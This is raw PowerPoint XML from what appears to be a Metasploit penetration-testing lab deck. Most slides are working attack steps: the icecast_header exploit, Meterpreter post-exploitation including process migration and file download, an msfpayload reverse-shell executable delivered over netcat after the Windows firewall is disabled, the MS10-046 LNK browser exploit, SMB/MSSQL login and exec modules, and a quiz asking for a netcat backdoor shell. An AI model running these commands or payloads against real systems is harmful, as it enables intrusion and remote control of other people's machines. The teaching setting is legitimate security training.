              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.144.30.207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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5555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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set TARGET O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="809475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Try the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> commands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dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysinfo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/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getuid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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; cd c:\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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwd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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; edit test.txt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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; edit test.txt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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; download test.txt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/test.txt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58138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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; execute -f cmd.exe –c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the execution is successful , the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will tell us its process ID and the channel number </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626324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Finishing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Recon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; interact [N]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt; hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipconfig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C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir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 err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getpid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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; PS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; migrate [destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Irocess_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getpid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197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Bonus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1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Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an Executable from payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>#./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> LPORT=12345 LHOST=10.144.30.xx X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the executable to a file and moving to windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>#./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> LPORT=12345 LHOST=10.144.30.xx X&gt; reverse_tcp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –l reverse_tcp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –v –n –l –p 2222 &lt; reverse_tcp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0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163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/>
              <a:t>In Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:/&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –v –n w3 test machine 2222 &gt; reverse_tcp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:/&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse_tcp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing the reverse shell payload executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –n  -v –l –p 12345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; set options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:/&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> firewall set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> disable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:/&gt; reverse_tcp.exe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797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Bonus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Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LNK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt; use exploit/windows/browser/ms10_046_shortcut_icon_dllloader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&gt;  set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;set SRVHOST test machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IPAdd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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;set LHOST test machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IPAdd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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On any Client machine simply open Internet Explorer and try to open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://10.144.30.x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666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Bonus 3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use scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>portscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>smb_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>scanner/ftp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ftp_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>use auxiliary/scanner/ftp/anonymous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984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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>smb_login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>use admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>mssql_exec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977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QUIZ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Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> snippets to identify email (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.5.10.0/24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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configure a listener as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that delivers windows shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1709580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900" b="1" dirty="0"/>
              <a:t>Categories of Exploits</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4900" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="49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Exploit:a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  piece of  code  that  makes  a  target machine does something on behalf of an attacker </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generally  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>speaking,  most  exploits  fall  into  one of  three  categories: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side  exploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side  exploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local  privilege  escalation </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A  penetration  tester  may  need  to  use  any  one, or  more  likely,  a combination  of  each  of  these kinds  of  attacks</a:t>
            </a:r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381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Server-Side Exploits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Listening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>service has a vulnerability </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker composes specific packets for service to exploit it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall filtering must allow inbound packets for given service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once we gain access to one system inside firewall, we may be able to pivot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="5105400"/>
            <a:ext cx="8839200" cy="1752600"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6495974" cy="869950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Text Box 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5076749" y="73152"/>
              <a:ext cx="1419225" cy="6654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latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Service listens on the network for incoming data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Text Box 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="987425" cy="8699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latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Attackers send exploit code to the service</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1404519" y="277977"/>
              <a:ext cx="965200" cy="2921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latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Exploit code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="computr2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="790042" y="95097"/>
              <a:ext cx="520700" cy="575310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 21600"/>
                <a:gd name="T2" fmla="*/ 10800 w 21600"/>
                <a:gd name="T3" fmla="*/ 21600 h 21600"/>
                <a:gd name="T4" fmla="*/ 17326 w 21600"/>
